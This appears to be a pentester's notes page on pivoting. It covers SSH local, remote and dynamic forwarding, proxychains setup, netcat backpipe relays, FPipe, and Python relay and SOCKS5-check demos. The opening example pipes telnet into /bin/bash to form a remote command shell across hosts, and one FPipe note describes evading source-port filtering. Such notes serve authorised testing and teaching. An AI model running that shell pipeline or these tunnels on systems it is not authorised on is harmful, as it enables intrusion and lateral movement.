Pivoting (Port Fun)
tags: Security Pivoting
Reference
NETSEC - Dynamic Port Forwarding (SSH)
HighOn.Coffee - SSH & Meterpreter Pivoting Techniques
Example
nc (A) <== telnet ==> /bin/bash on B ==> telnet ==> nc (C)
Commands typed into the listener on A are executed by /bin/bash on B; the output arrives at the listener on C. Only telnet and bash are needed on B (no nc, no -e). -k keeps each listener alive across disconnects.
Machine A (input side):
nc -lk -n -v 7777
Machine B (the pivot; connects out to both A and C):
telnet A.A.A.A 7777 | /bin/bash | telnet C.C.C.C 7777
Machine C (output side):
nc -lk -n -v 7777
A:9000 <== ssh via B ==> C:80
Machine A (port 9000 on A is forwarded through B to C:80; browse to http://127.0.0.1:9000 on A):
ssh -i ~/.ssh/B.root.key -L 9000:C.C.C.C:80 B.B.B.B
or add the forward to an already open session with the ssh escape command line:
ssh B.B.B.B
<enter>
<enter>
~C
ssh> -L 9000:C.C.C.C:80
~C is only recognised at the start of a fresh line, hence the blank Enters first. OpenSSH 9.2 and later disable this command line by default; connect with -o EnableEscapeCommandline=yes to get it back.
local:1080 socks5 <== ssh 10.10.10.75 ==> any host 10.10.10.75 can reach
ssh -D 1080 10.10.10.75
netstat -alnp | grep LIST | grep 1080   # confirm the SOCKS listener is bound (loopback only unless you give -D 0.0.0.0:1080)
vim /etc/proxychains.conf
: [ProxyList]
: # add proxy here ...
: # meanwhile
: # defaults set to "tor"
: #socks4 127.0.0.1 9050
: # metasploit
: #socks4 127.0.0.1 1080
: # ssh
: socks5 127.0.0.1 1080
proxychains curl -k https://10.10.10.60
proxychains hooks the libc connect() of dynamically linked programs only; statically linked tools are not tunnelled. With proxy_dns enabled, name lookups go through the pivot as well, so use IPs when you do not want that.
temp
Note: FPipe.exe -l [listen port] -s [outbound source port] -r [remote port] [remote IP]
FPipe.exe -l 80 -s 80 -r 80 192.168.1.7   # accept on local port 80, forward to 192.168.1.7:80, using source port 80 for the outbound leg (gets past source-port based filtering)
Note: ssh -L [local port]:[target host]:[target port] [user]@[ssh host]    # local port on this box -> target, via the ssh host
Note: ssh -R [remote port]:[target host]:[target port] [user]@[ssh host]   # port on the ssh host -> target, via this box
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local forward: my 127.0.0.1:8080 reaches port 80 on 192.168.1.7 (the 127.0.0.1 is resolved on 192.168.1.7)
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote forward: 192.168.1.7's 127.0.0.1:8080 reaches port 80 on my box (stays on loopback there unless sshd has GatewayPorts yes)
Note: mknod backpipe p ; nc -l -p [listen port] < backpipe | nc [target IP] [target port] > backpipe   # the named pipe carries the reply direction; a plain pipeline only flows one way
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 > backpipe # Port Relay: local 8080 -> 10.5.5.151:80
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy: 8080 -> localhost:80, both directions logged to inflow/outflow
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe & # Proxy monitor: same, backgrounded; watch the traffic with tail -f inflow outflow
These use traditional netcat syntax (-l -p); OpenBSD nc rejects -p together with -l and wants nc -l 8080 instead. Without -k the relay serves one connection and exits.
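The backpipe is needed because a shell pipeline only carries bytes one way. As an added example (not from this page or its references), here is the same two-direction relay with tee-style logging written in Python, for hosts where netcat lacks what you need: relay_connection copies bytes in both directions and records them as inflow/outflow, and run_demo exercises it against a constructed stand-in target that uppercases whatever it receives. All addresses are loopback and all ports ephemeral; those, the target's behaviour and the payload are assumptions for the demo only.

```python
import socket
import threading


def pump(src, dst, log):
    """Copy bytes src -> dst until EOF, appending each chunk to log (what tee -a does)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append(data)
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF so the other direction finishes
        except OSError:
            pass


def relay_connection(client, target_host, target_port):
    """Relay one accepted client socket to target_host:target_port.

    One pump per direction replaces the backpipe trick. Returns (inflow, outflow):
    everything the client sent and everything the target answered."""
    inflow, outflow = [], []
    with socket.create_connection((target_host, target_port)) as upstream:
        t = threading.Thread(target=pump, args=(client, upstream, inflow))
        t.start()
        pump(upstream, client, outflow)
        t.join()
    client.close()
    return b"".join(inflow), b"".join(outflow)


def start_relay(target_host, target_port):
    """Listen once on an ephemeral loopback port (like nc -l -p without -k), relay the
    first connection in a thread, and return (listen_port, result) where
    result['logs'] holds (inflow, outflow) once result['done'] is set."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    result = {"done": threading.Event()}

    def accept_and_relay():
        client, _ = srv.accept()
        srv.close()
        result["logs"] = relay_connection(client, target_host, target_port)
        result["done"].set()

    threading.Thread(target=accept_and_relay, daemon=True).start()
    return srv.getsockname()[1], result


def _start_upper_server():
    """Constructed stand-in for the service behind the pivot: reads until EOF and
    replies with the data uppercased, so the reply differs from the request."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def handle():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            buf = b""
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
            conn.sendall(buf.upper())

    threading.Thread(target=handle, daemon=True).start()
    return srv.getsockname()[1]


def run_demo(payload=b"hello from the pivot\n"):
    """Send payload through the relay to the stand-in target; returns (reply, inflow, outflow)."""
    target_port = _start_upper_server()
    relay_port, result = start_relay("127.0.0.1", target_port)
    with socket.create_connection(("127.0.0.1", relay_port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # tell the relay we are done sending, as a client closing its write side would
        reply = b""
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            reply += chunk
    result["done"].wait(5)
    inflow, outflow = result["logs"]
    return reply, inflow, outflow


if __name__ == "__main__":
    print(run_demo())
```

Unlike the shell version, this keeps the two log streams in memory; write them to files if you need the inflow/outflow records to survive the process.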
Is tunnelling possible? Run a command locally, then the same command through the tunnel, and compare the results.
ssh -D 127.0.0.1:9050 -N [username]@[ip]   # 9050 matches the default tor entry in proxychains.conf, so no config edit is needed; -N opens no remote shell
proxychains ifconfig   # only shows that proxychains loads: ifconfig opens no network connection, so it proves nothing about the tunnel. Use something that actually connects, such as the proxychains curl above, to confirm traffic leaves via the pivot.
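A check that actually exercises the SOCKS listener, as an added example in Python (not from this page or its references): socks5_connect performs the RFC 1928 no-auth greeting and CONNECT request that ssh -D expects, check_tunnel pushes a probe through it, and run_demo drives both against a constructed fake SOCKS5 server, once succeeding and once refusing, so the error path is shown too. The fake server, the loopback ports, the target 10.10.10.60:443 and the probe bytes are assumptions for the demo; point check_tunnel at ("127.0.0.1", 1080) or 9050 and a real internal host to use it against an actual tunnel.

```python
import socket
import struct
import threading

# RFC 1928 reply codes; anything but 0 means the pivot could not reach the target.
SOCKS5_REPLIES = {0: "succeeded", 1: "general SOCKS server failure", 2: "not allowed by ruleset",
                  3: "network unreachable", 4: "host unreachable", 5: "connection refused",
                  6: "TTL expired", 7: "command not supported", 8: "address type not supported"}


def _recv_exact(sock, n):
    """recv() may return short reads; read exactly n bytes or raise."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy, dest_host, dest_port, timeout=5.0):
    """Return a socket to dest_host:dest_port opened through a no-auth SOCKS5 proxy.

    Greeting: VER=5 NMETHODS=1 METHOD=0 (no auth); expect 05 00 back.
    Request:  VER=5 CMD=1 (CONNECT) RSV=0 ATYP=3 (domain) LEN host PORT, so the
    name is resolved on the pivot side, which is what proxychains' proxy_dns does."""
    s = socket.create_connection(proxy, timeout=timeout)
    try:
        s.sendall(b"\x05\x01\x00")
        ver, method = _recv_exact(s, 2)
        if ver != 5 or method != 0:
            raise ConnectionError(f"not a no-auth SOCKS5 listener (ver={ver}, method={method:#x})")
        host = dest_host.encode()
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host + struct.pack("!H", dest_port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if ver != 5 or rep != 0:
            raise ConnectionError(f"CONNECT to {dest_host}:{dest_port} failed: {SOCKS5_REPLIES.get(rep, hex(rep))}")
        # Drain BND.ADDR and BND.PORT so the caller's first recv() only sees target data.
        addr_len = {1: 4, 4: 16}.get(atyp) or (_recv_exact(s, 1)[0] if atyp == 3 else None)
        if addr_len is None:
            raise ConnectionError(f"unknown ATYP {atyp:#x} in reply")
        _recv_exact(s, addr_len + 2)
        return s
    except Exception:
        s.close()
        raise


def check_tunnel(proxy, dest_host, dest_port, probe=b"probe through the pivot\n"):
    """Send probe to the target via the proxy and return whatever comes back."""
    with socks5_connect(proxy, dest_host, dest_port) as s:
        s.sendall(probe)
        s.shutdown(socket.SHUT_WR)
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
        return data


def _start_fake_socks5(seen, reply_code=0):
    """Constructed stand-in for the ssh -D listener (not a real proxy): records the
    requested destination in seen['dest'], answers reply_code, then echoes bytes back."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def handle():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            _recv_exact(conn, _recv_exact(conn, 2)[1])  # greeting: skip the method list
            conn.sendall(b"\x05\x00")
            _recv_exact(conn, 4)  # request header; the client above always sends ATYP=3
            host = _recv_exact(conn, _recv_exact(conn, 1)[0]).decode()
            seen["dest"] = (host, struct.unpack("!H", _recv_exact(conn, 2))[0])
            conn.sendall(b"\x05" + bytes([reply_code]) + b"\x00\x01" + bytes(6))  # BND = 0.0.0.0:0
            while reply_code == 0:
                chunk = conn.recv(4096)
                if not chunk:
                    return
                conn.sendall(chunk)

    threading.Thread(target=handle, daemon=True).start()
    return srv.getsockname()[1]


def run_demo():
    """Working proxy: the probe echoes back and the proxy saw our target.
    Broken proxy: CONNECT is refused and the reason is surfaced."""
    seen = {}
    good = _start_fake_socks5(seen)
    echoed = check_tunnel(("127.0.0.1", good), "10.10.10.60", 443)
    bad = _start_fake_socks5({}, reply_code=5)
    try:
        check_tunnel(("127.0.0.1", bad), "10.10.10.60", 443)
        error = None
    except ConnectionError as exc:
        error = str(exc)
    return echoed, seen["dest"], error


if __name__ == "__main__":
    print(run_demo())
```

Against a real ssh -D listener the interesting result is the reply code: "host unreachable" or "connection refused" tells you the pivot itself cannot reach the target, which a failed proxychains curl does not distinguish from a broken proxy setup.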